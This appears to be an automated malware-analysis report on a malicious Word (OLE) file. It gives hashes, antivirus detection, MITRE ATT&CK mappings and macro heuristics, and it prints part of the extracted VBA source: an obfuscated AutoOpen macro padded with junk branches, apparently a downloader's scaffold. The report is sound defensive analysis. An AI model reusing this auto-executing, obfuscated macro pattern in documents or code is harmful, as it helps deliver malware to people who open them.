Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4dcdf99c5887c75f…

MALICIOUS

Office (OLE)

166.4 KB Created: 2019-04-25 09:26:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 7a7ffb5f4170fc8bd9a05b1dbce6884b SHA-1: 9e07f5fa269846779557e94dced9ce169aca664f SHA-256: 4dcdf99c5887c75f537f1e0fb424246417848c992eafb905c73c8c93ac4aa5d1
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV and contains a high-severity OLE_VBA_AUTOOPEN heuristic, indicating the presence of an auto-executing VBA macro. The macro is designed to execute code using GetObject, likely to download and run a second-stage payload. No specific family could be identified, but the technique suggests a macro-based downloader.

Heuristics 7

  • ClamAV: Doc.Malware.Dvwf-6956245-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Dvwf-6956245-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25546 bytes
SHA-256: 63552ef952b653ad980325adb7767d567b0b555ec0f33d991ecea5e213c95f33
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "OAAAZC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wQDCAcC"
Attribute VB_Base = "0{EC36BAE5-7ADE-4F95-B004-CE1957793634}{5B1E76E0-9352-4FC3-AED8-71E38191B46E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "I4XAUBBZ"
Attribute VB_Base = "0{C824A8E8-B0A3-406D-9B48-F91A9EA68976}{0778C759-CC9F-4601-AD3A-CD781E9CA4CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "dBACAAA1"
Sub autoopen()
   If v_AQQCBc = kZABkQA Then
ElseIf u_UAUCA = mxBDXA Then
            s4ACxUA = Atn(454565679)
ElseIf YCkkooQ = LUxBQ41 Then
            uA1UA_GQ = Int(999281804)
ElseIf oA4Q1QAX = j1GQAA Then
End If
   If LQX4BAA = iAABBABQ Then
ElseIf m_4AUBAA = hUAAZB Then
            b_QUAX = Atn(430765672)
ElseIf jwDAAD = t4xAxAQo Then
            KcUDcU = Int(727024415)
ElseIf MxGA1D_A = qXxDc4 Then
End If
   If UQcoCA = ZXAUGD Then
ElseIf KAZUBAB = ZAUUAk Then
            ZA1AQB_ = Atn(632069907)
ElseIf IACDXDA = FZGDAAQA Then
            jAA_AXx = Int(911954614)
ElseIf QxDAoG4A = AAAw_c Then
End If
c4DDUC
   If wABAQQ = iDQkAw Then
ElseIf VQD1UU_ = tZUXBDBA Then
            nAXkDD1A = Atn(39628240)
ElseIf hAAAcxXZ = j_QAAB Then
            mCBA1G = Int(53483851)
ElseIf zCA1AXA = XC4AAA Then
End If
   If lABXZQ = AAAABA Then
ElseIf MUBkQD = YGQBDBG Then
            LoAAAUkA = Atn(70914249)
ElseIf ADACAA = sAD4UXA Then
            bAAwAc = Int(631660017)
ElseIf ToG_QU = SDQBQAcA Then
End If
End Sub
Function XXxX4Dw(mQoADc)
   If MAA4A4G = zDCcQA Then
ElseIf VoA1ABB = MDQBAA Then
            aACDxXG = Atn(903441126)
ElseIf rA11AAoB = PcDUAXD Then
            TBB4_AA = Int(374880229)
ElseIf lDUDAxx = j4c1ZQwQ Then
End If
   If UUAAU_ = f1QUAo Then
ElseIf t4oAcZ = twGAAADB Then
            IZw4oAUA = Atn(324071606)
ElseIf SAc11AA = BAAAQXAA Then
            LGcAUAAA = Int(711569659)
ElseIf rXoAQcU4 = CUABA4A Then
End If
Set XXxX4Dw = CVar(mQoADc)
   If YAQG_w = wAADcA Then
ElseIf pXQAo_G = uAGA4AAZ Then
            pAAAACo = Atn(806537656)
ElseIf U1UA_B = BXxGDG Then
            rwDAXBBQ = Int(875458927)
ElseIf H1DcAD = ixQ4QBU Then
End If
   If pkBoxZGA = QAA4D1kQ Then
ElseIf VBXAAcoU = ickQDAA Then
            HXX1Dk = Atn(396828347)
ElseIf CAowAAU = WkxA1UAA Then
            jQXAQQ = Int(397614101)
ElseIf cBADDD = mDX1AkAU Then
End If
End Function

Attribute VB_Name = "v_oDAA1"
Function c4DDUC()
On Error Resume Next
   If TADxxoB = wGU1Qo Then
ElseIf XUZBA1A = AQA1Q1Z Then
            WAcQQ_Bc = Atn(902672992)
ElseIf uA4_c4 = BAAA_ABx Then
            WUoc4_GA = Int(685590749)
ElseIf lDUQ1_ = k1AAG1BU Then
End If
   If cDAUAABA = IAcUAZG Then
ElseIf TA4ADQ = zCQQADw Then
            dxAXkoDZ = Atn(512946224)
ElseIf OZAoAA = wQDXQBAX Then
            SwAXAAGC = Int(918804106)
ElseIf NABGA1_A = EA111wB Then
End If
If 5072 < 19851 Then
tA_QAB4w = vbFalse
   If qGAAwowB = iCGAQBZ Then
ElseIf b1XAwU = n_GAAAc Then
            NooAGwcC = Atn(996313995)
ElseIf UBxUAwB = MUXBA_D Then
            oAUUx1A = Int(645588906)
ElseIf EX_wGQAX = fBAQQZBG Then
End If
   If jUAAGUoc = v44GACQ Then
ElseIf J1GDXACQ = LAAwAAA Then
            Y4AA_AA = Atn(887414397)
ElseIf UCCAQA = fQcAAk Then
            iDDXAcBo = Int(141127305)
ElseIf AXXAXGD = OZxZQwQB Then
End If
   If wAAADDQ = Aw4wQDA Then
ElseIf PAAZADU = tBGDwB4 Then
            nAAUDAA = Atn(51129147)
ElseIf FCxAw4A = YxABDUAA Then
            BQABBZUA = Int(578241693)
ElseIf txAA4ABA = IwA_QcU 
... (truncated)